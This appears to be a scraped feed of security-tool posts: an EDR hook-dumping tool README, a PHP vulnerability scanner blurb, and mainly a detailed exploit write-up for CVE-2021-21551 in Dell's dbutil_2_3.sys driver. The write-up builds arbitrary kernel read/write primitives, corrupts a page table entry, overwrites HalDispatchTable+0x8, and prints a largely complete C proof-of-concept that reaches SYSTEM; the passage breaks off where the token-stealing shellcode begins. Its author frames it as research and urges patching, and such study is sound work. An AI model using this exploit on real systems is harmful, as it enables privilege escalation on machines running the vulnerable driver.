EDR function hook dumping

Please refer to the Zeroperil blog post for more information https://zeroperil.co.uk/hookdump/


Building source
  • In order to build this you will need Visual Studio 2019 (community edition is fine) and CMake. The batch file Configure.bat will create two build directories with Visual Studio solutions.
  • The project may build with MinGW given the correct CMake command line, but this is untested; YMMV.
  • There is a dependency on zydis disassembler, so be sure to update the sub-modules in git before configuring the project.
  • There are 32-bit and 64-bit projects; you may find that EDRs hook different functions in 32-bit and 64-bit processes, so building and running both executables may provide more complete results

Notes
  • Some EDRs replace the WOW stub in the TEB structure (specifically Wow32Reserved) in order to hook system calls for 32-bit binaries. In this case you may see zero hooks, since no jump instructions are present in NTDLL. Most likely you will see hooks in the x64 version, as the syscall instruction is used for system calls instead of a WOW stub
  • We have noted that Windows Defender does not use any user mode hooks
  • This tool is designed to be run as a standard user, elevation is not required

Hook Types Detected

JMP

A jump instruction has been patched into the function to redirect execution flow


WOW

Detection of the WOW64 syscall stub being hooked, which allows filtering of all system calls


EAT

The address in the in-memory export address table does not match the corresponding address in the export address table of the copy on disk


GPA

GetProcAddress hook, an experimental feature. This is only output in verbose mode, when the result of GetProcAddress does not match the manually resolved function address. YMMV with this, and some care should be taken to verify the results.


Verification

The only way to truly verify the correct working of the program is to check in a debugger if hooks are present. If you are getting a zero hooks result and are expecting to see something different, then first verify this in a debugger and please get in touch.



☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Php_Code_Analysis - Scan your PHP code for vulnerabilities

By: Zion3R


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

☑ ★ ✇ Connor McGarr

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

By: Connor McGarr

Introduction

Recently I said I was going to focus on browser exploitation since Advanced Windows Exploitation was canceled. With this cancellation, I found myself craving binary exploitation training, as AWE has now been canceled two years in a row. Due to the cancellation, I enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Satoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is that there is an IOCTL code that any client can trigger with a call to DeviceIoControl, and this IOCTL routine eventually reaches a memmove call whose arguments are taken from the user-supplied buffer passed to the vulnerable IOCTL.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.
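
As a rough sketch (this fragment mirrors the handle-opening code in the full POC at the end of this post, which contains the necessary includes):

HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
);

// Error handling
if (driverHandle == INVALID_HANDLE_VALUE)
{
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
}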

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t foolproof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise-grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.
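
For reference, the C runtime prototype is:

void *memmove(void *dest, const void *src, size_t count);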

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains: we see there are tons of code branches in this driver. We need to make sure that, from the time our IOCTL code is checked and we are directed towards our code path, any compare statements that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.
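
A minimal sketch of that first attempt, reusing the driver handle from above and the vulnerable IOCTL code (this follows the same DeviceIoControl pattern used in the full POC at the end of this post):

unsigned long long inBuf = 0x4141414141414141;
DWORD bytesReturned = 0;

DeviceIoControl(
    driverHandle,
    0x9B0C1EC8,        // vulnerable IOCTL
    &inBuf,
    sizeof(inBuf),     // only 8 bytes (one QWORD) for now
    &inBuf,
    sizeof(inBuf),
    &bytesReturned,
    NULL
);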

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub_15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sub rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD (8 bytes). Obviously this compare statement will fail, and an NTSTATUS code of 0xC000000D, which means STATUS_INVALID_PARAMETER, is returned to the client. This is the driver’s way of letting the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will need to send at least 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.
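
A sketch of the refactored buffer (three QWORDs, 0x18 bytes total; the values here are simply placeholder junk):

unsigned long long inBuf[3];
inBuf[0] = 0x4141414141414141;
inBuf[1] = 0x4242424242424242;
inBuf[2] = 0x4343434343434343;

DWORD bytesReturned = 0;

DeviceIoControl(
    driverHandle,
    0x9B0C1EC8,
    &inBuf,
    sizeof(inBuf),     // now 0x18 bytes
    &inBuf,
    sizeof(inBuf),
    &bytesReturned,
    NULL
);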

After hitting the sub_15294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr [rsp+0x30] instruction, which moves the DWORD on the stack at RSP+0x30 into ECX, we can see that a value of 0x00000000 is about to be placed into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts pointers to memory. Since we passed raw junk values, these addresses are invalid. Because of this, let’s switch up our POC a bit to see if we can get the desired result. Let’s use KUSER_SHARED_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20-byte buffer. Kasif points out that, before reaching the call, the memmove routine pulls the destination from offset 0x8 of our buffer and the source from offset 0x18.
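
A hedged sketch of that 0x20-byte buffer layout, consistent with the offsets described above (the role of the QWORD at offset 0x10 becomes clear in the next few steps):

unsigned long long inBuf[4];
inBuf[0] = 0x4141414141414141;   // offset 0x0  - filler
inBuf[1] = 0xFFFFF78000000800;   // offset 0x8  - destination ("where"), KUSER_SHARED_DATA+0x800
inBuf[2] = 0x4242424242424242;   // offset 0x10 - lower 32 bits end up added to the destination
inBuf[3] = 0x4343434343434343;   // offset 0x18 - source data ("what")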

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, four 0x42 bytes (0x42424242) will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue, however, is with the target address. We were attempting to target 0xFFFFF78000000800, but our address got mangled into 0xFFFFF78042424242. This is because the lower 32 bits of one of our user-supplied QWORDs first get added to the destination address. If we resend the exploit and replace the value 0x4242424242424242 with 0x0000000000000000, we can “bypass” this issue: a value of 0 is added instead, meaning our target address remains unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall from the earlier image showcasing our successful arguments that, since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel-mode address. This means, at some point between our invocation of DeviceIoControl and the memmove call, our array of QWORDs was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass as the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmove routine writes the data to that output buffer.

The latter option makes sense, as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to call this IOCTL, meaning the input and output buffers are most likely being used by other kernel-mode components or legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially do the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could set up our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, similar to last time, we will set the second value of our QWORD array to the address we want to read from and set everything else to 0. Then, we will reuse the same array of QWORDs as an output buffer and see if anything was written to it.
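
A sketch of the updated buffer and call (this mirrors the read routine in the full POC at the end of this post, using KUSER_SHARED_DATA as the address to read):

unsigned long long inBuf[4];
inBuf[0] = 0x4141414141414141;    // filler
inBuf[1] = 0xFFFFF78000000000;    // address we want to dereference and read from
inBuf[2] = 0x0000000000000000;
inBuf[3] = 0x0000000000000000;

DWORD bytesReturned = 0;

DeviceIoControl(
    driverHandle,
    0x9B0C1EC4,        // the "read" IOCTL
    &inBuf,
    sizeof(inBuf),
    &inBuf,            // reuse the same array as the output buffer
    sizeof(inBuf),
    &bytesReturned,
    NULL
);

// If this works, inBuf[3] should contain the dereferenced contents of 0xFFFFF78000000000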

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instructions, we can see our input buffer for the read primitive is being propagated and set up for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element contains the dereferenced contents of the value we wanted to read from! Now that we have a vanilla one-QWORD arbitrary read/write primitive, we can get into our exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate the location of the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know that where we want to write to is at an offset of 0x3000 (the offset to .data) + 0x10 (the offset to the code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which is already a kernel-mode page and is writable (you could also use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation added to Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The kernel function nt!MiGetPteAddress contains, at an offset of 0x13 into the function, the randomized base of the page table entries, since this function is what the kernel itself uses to compute PTE addresses.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.
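
Programmatically, that calculation looks like the following (this mirrors the PTE math in the full POC below, where shellcodeLocation is the address of our code cave and pteBase is the leaked PTE base):

// Mask off the offset/sign-extension bits and index into the PTE array
unsigned long long shellcodePte = (shellcodeLocation >> 9) & 0x7FFFFFFFF8;
shellcodePte = shellcodePte + pteBase;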

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!
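
A minimal sketch of that bit manipulation, assuming the standard x64 PTE layout in which the most significant bit (bit 63) is the no-eXecute bit (the exact constant used in the final exploit may differ):

// Clear the NX bit (bit 63) on the preserved PTE bits; the tainted value is then
// written back over the PTE with the arbitrary write primitive
unsigned long long taintedPte = pteBits & ~(1ULL << 63);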

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer at nt!HalDispatchTable+0x8 with the address of our shellcode. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, a call to this QWORD will be triggered. However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].
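
A sketch of that resolution and the call that kicks everything off, reusing the NtQueryIntervalProfile_t typedef from the final POC (the ProfileSource value here is arbitrary):

// Resolve ntdll!NtQueryIntervalProfile dynamically
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
    GetModuleHandleA("ntdll.dll"),
    "NtQueryIntervalProfile"
);

// Invoking the function eventually reaches [nt!HalDispatchTable+0x8] - our shellcode
ULONG interval = 0;
NtQueryIntervalProfile(0x1234, &interval);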

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call to nt!KeQueryIntervalProfile, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of nt!KeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning: at compile time, when the bitmap was created, did the address exist, and is it a part of a valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;
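      // The math above follows the standard x64 PTE formula: a page's PTE index is
      // VA >> 12 and each PTE is 8 bytes, so (VA >> 12) * 8 == VA >> 9. The mask
      // 0x7FFFFFFFF8 keeps only the 8-byte-aligned index, which is then added to
      // the leaked (randomized) PTE base.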

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
